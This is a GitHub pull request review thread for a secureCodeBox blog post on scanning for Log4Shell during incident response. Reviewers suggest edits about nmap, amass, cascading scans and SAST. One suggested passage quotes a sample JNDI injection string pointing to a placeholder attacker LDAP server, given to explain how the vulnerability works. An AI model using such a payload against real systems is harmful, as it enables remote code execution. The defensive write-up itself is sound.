"How we handled Log4J using SCB" Blog Post
secureCodeBox/documentation pull request #226
Opened 2022-02-16 13:48 UTC by malexmave

We want to document how we used secureCodeBox in our incident reponse for Log4J.

2022-02-28 09:35 UTC, Weltraumschaf requested changes
LGTM

2022-02-28 09:35 UTC, Weltraumschaf commented on blog/2022-01-18-log4shell.md
> +But first, a small refresher: In late November 2021, a [zero-day vulnerability was discovered in the widely used Java logging library Log4J](https://nakedsecurity.sophos.com/2021/12/13/log4shell-expl
```suggestion
But first, a small refresher: In late November 2021, a [zero-day vulnerability was discovered in the widely used Java logging library Log4J](https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/). It allowed attackers to remotely execute code through Java Naming and Directory Interface ([JNDI](https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface)) lookups to malicious LDAP servers: If an attacker can get the application to log a payload controlled by the attacker, like `{jndi:ldap//evil.ldap.server.adress/a}`, then the code hosted on the LDAP server would be loaded and executed by the program, effectively letting third parties take control of the Java Application and the server it's running on.
```

2022-02-28 20:51 UTC, Weltraumschaf approved these changes

2022-02-28 21:07 UTC, rseedorff commented on blog/2022-01-18-log4shell.md
> +This blog describes how we used the secureCodeBox in our incident response process at Iteratec.
```suggestion
This blog describes how we used the secureCodeBox in our incident response process at iteratec.
```

2022-02-28 21:10 UTC, rseedorff commented on blog/2022-01-18-log4shell.md
> +At [Iteratec](https://www.iteratec.com), as a software development company, we had to assess our security posture as well - for both the infrastructure that we were running for ourselves, as well as
```suggestion
At [iteratec](https://www.iteratec.com), as a software development company, we had to assess our security posture as well - for both the infrastructure that we were running for ourselves, as well as the software we develop for our customers.
```

2022-02-28 21:20 UTC, rseedorff commented on blog/2022-01-18-log4shell.md
> +replicaCount: 1
I'm not quite sure if or why it is helpful to explain the process how to "implement" a specific demo target 🤔 What is in it for me as reader (how is not yet a contributer)?

2022-02-28 21:25 UTC, rseedorff commented on blog/2022-01-18-log4shell.md
> +To scan for the Log4Shell vulnerabilities dynamically we first have to identify what to scan.
```suggestion
To scan for the Log4Shell vulnerabilities dynamically (DAST) we first have to identify what to scan, the so called attack surface.
```

2022-02-28 21:31 UTC, rseedorff commented on blog/2022-01-18-log4shell.md
> +Using the secureCodeBox we used the [cascading scanning mechanism](https://docs.securecodebox.io/docs/hooks/cascading-scans) to run an initial scan to discover scan targets and use their result to au
```suggestion
One powerful feature of the secureCodeBox is the dynamic scan orchestration of different security scanner:
 the [cascading scans mechanism](https://docs.securecodebox.io/docs/hooks/cascading-scans).  Based on that it is easy to run an initial scan to discover scan targets and use their result to automatically start (cascade) specialized scans for the identified hosts and domains.
```

2022-02-28 21:38 UTC, rseedorff commented on blog/2022-01-18-log4shell.md
> +1. For hosts in the internal networks, we used the secureCodeBox `nmap` scanType to scan for hosts and open ports in our internal IP ranges (e.g. 10.42.0.0/16). Every port which nmap identified to be
```suggestion
1. For hosts sitting in internal networks, we used nmap ([with the secureCodeBox `nmap` scanType](https://www.securecodebox.io/docs/scanners/nmap)) to identify active hosts and open ports in our internal IP ranges (e.g. 10.42.0.0/16) and network segments. Every port which nmap identified to be related to http(s) (which is generally the easiest protocol to scan for Log4Shell even thought it can also be exploitable via different protocols) was used as a target in a cascading Log4Shell scan.
```

2022-02-28 21:45 UTC, rseedorff commented on blog/2022-01-18-log4shell.md
> +2. For publicly available hosts, we used the `amass` scanType to find subdomains for the list of domain names we own as a company. This outputs a list of a subdomains which we then use to automatical
```suggestion
2. For publicly available hosts, we used the OWASP AMASS scanner ([with the secureCodeBox `amass` scanType](https://www.securecodebox.io/docs/scanners/amass)) first to find subdomains for the list of domain names we own as a company. This outputs a list of a subdomains which also automatically trigger `nmap` cascading scans to find open http(s) ports for the actual Log4Shell vulnerability assessment.
```

2022-02-28 21:48 UTC, rseedorff commented on blog/2022-01-18-log4shell.md
> +In parallel, we used the static code analysis capabilities of the secureCodeBox to scan our software repositories for places where code may have been missed.
```suggestion
In parallel, we used the static code analysis capabilities (SAST) of the secureCodeBox to scan our software repositories for places where code may have been missed.
```

2022-02-28 22:05 UTC, rseedorff requested changes
Added some comments and hint for improvement.

2022-03-03 08:37 UTC, malexmave commented on blog/2022-01-18-log4shell.md
> +replicaCount: 1
The idea is that we show the entire process for someone if they want to do incident response. That way, they also know how to build their own demo target to test their detection rules against.

2022-03-15 12:46 UTC, merged